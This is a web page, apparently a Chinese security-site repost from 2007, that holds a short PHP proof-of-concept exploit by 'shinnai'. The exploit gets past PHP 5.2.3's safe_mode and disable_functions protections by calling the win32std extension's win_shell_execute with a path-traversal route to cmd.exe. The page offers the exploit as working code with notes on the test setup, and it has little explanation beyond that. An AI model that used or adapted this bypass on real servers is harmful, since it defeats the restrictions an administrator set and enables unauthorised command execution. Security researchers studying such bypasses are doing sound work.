| PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass | 
 
| 来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2007-07-25 | 
 
| 
 
|  | <?php //PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
 
 //author: shinnai
 //mail: shinnai[at]autistici[dot]org
 //site: http://shinnai.altervista.org
 
 //Tested on xp Pro sp2 full patched, worked both from the cli and on apache
 
 //Thanks to rgod for all his precious advises :)
 
 //I set php.ini in this way:
 //safe_mode = On
 //disable_functions = system
 //if you launch the exploit from the cli, cmd.exe will be wxecuted
 //if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
 
 if (!extension_loaded("win32std")) die("win32std extension required!");
 system("cmd.exe"); //just to be sure that protections work well
 win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
 ?>
 
 
 |   
|  |  | 
 
| [  推荐] 
[  评论(0条)] 
[返回顶部] [打印本页] 
[关闭窗口] | 
 
|  | 
 
|  |